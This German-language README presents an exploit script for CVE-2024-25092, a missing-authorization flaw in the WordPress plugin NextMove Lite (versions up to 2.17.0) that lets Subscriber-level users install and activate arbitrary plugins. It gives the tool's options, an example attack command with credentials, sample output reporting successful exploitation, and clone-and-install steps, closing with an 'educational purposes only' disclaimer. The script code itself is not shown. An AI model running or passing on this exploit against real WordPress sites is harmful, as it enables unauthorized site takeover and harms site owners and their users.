
WordPress NextMove Lite Plugin <= 2.17.0 - Schwachstelle für beliebige Plugin-Installation/-Aktivierung durch Subscriber+
CVE-2024-25092 ist eine Schwachstelle mit hohem Schweregrad, die das WordPress-Plugin NextMove Lite (Versionen <= 2.17.0) betrifft. Diese Schwachstelle ermöglicht es einem Benutzer mit Subscriber-Rechten oder höher, beliebige Plugins auf einer WordPress-Website zu installieren und zu aktivieren, da Autorisierungsprüfungen fehlen.
Das Plugin XLPlugins NextMove Lite für WordPress weist eine Schwachstelle aufgrund fehlender Autorisierung auf, die es authentifizierten Benutzern mit Subscriber-Berechtigungen oder höher ermöglicht, beliebige Plugin-Installationen und -Aktivierungen durchzuführen. Dies kann zu einer vollständigen Kompromittierung der WordPress-Website führen.
Das bereitgestellte Python-Skript automatisiert die Ausnutzung dieser Schwachstelle, indem es sich bei der WordPress-Website anmeldet und ein angegebenes Plugin installiert.
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requestsRepository klonen:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
Erforderliche Python-Pakete installieren:
pip install requests
Dieses Skript ist nur für Bildungszwecke bestimmt. Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine ausdrückliche Genehmigung haben. Die unbefugte Nutzung dieses Skripts ist illegal und unethisch.